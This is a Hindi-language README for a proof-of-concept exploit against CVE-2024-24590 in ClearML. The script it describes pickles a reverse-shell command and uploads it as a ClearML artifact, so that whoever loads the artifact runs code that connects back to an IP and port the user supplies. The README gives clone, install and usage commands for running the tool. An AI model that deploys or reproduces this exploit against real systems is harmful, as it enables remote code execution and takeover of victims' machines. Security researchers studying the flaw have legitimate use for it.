
CVE-2024-24590 के लिए प्रूफ ऑफ कॉन्सेप्ट
_____ _ __ __ _ _____ ____ _____
/ ____| | | \/ | | | __ \ / __ \ / ____|
| | | | ___ __ _ _ __| \ / | | | |__) | | | | |
| | | |/ _ \/ _` | '__| |\/| | | | ___/| | | | |
| |____| | __/ (_| | | | | | | |____ | | | |__| | |____
\_____|_|\___|\__,_|_| |_| |_|______| |_| \____/ \_____| - 2024-24590 x OxyDe
यह प्रोजेक्ट दर्शाता है कि कमांड लाइन तर्कों के माध्यम से कॉन्फ़िगर करने योग्य पैरामीटर्स के साथ ClearML में एक pickle artifact को गतिशील रूप से कैसे अपलोड किया जाए। स्क्रिप्ट एक ClearML टास्क initialize करती है, रिवर्स शेल निष्पादन के लिए एक कमांड को गतिशील रूप से कॉन्फ़िगर करती है, और इसे एक artifact के रूप में अपलोड करती है। (PoC-CVE-2024-24590)
clearml पैकेजargparse पैकेजpickle पैकेजos मॉड्यूलClearML पैकेज इंस्टॉल करें:
pip install clearml
रिपॉजिटरी क्लोन करें:
git clone https://github.com/OxyDeV2/PoC-CVE-2024-24590.git
cd PoC-CVE-2024-24590
स्क्रिप्ट चलाने के लिए, उपयुक्त तर्कों के साथ निम्न कमांड का उपयोग करें:
python script.py --project_name "<project_name>" --task_name "<task_name>" --tags <tag1> <tag2> ... --artifact_name "<artifact_name>" --ip "<ip_address>" --port "<port>"
Skriix को धन्यवाद :)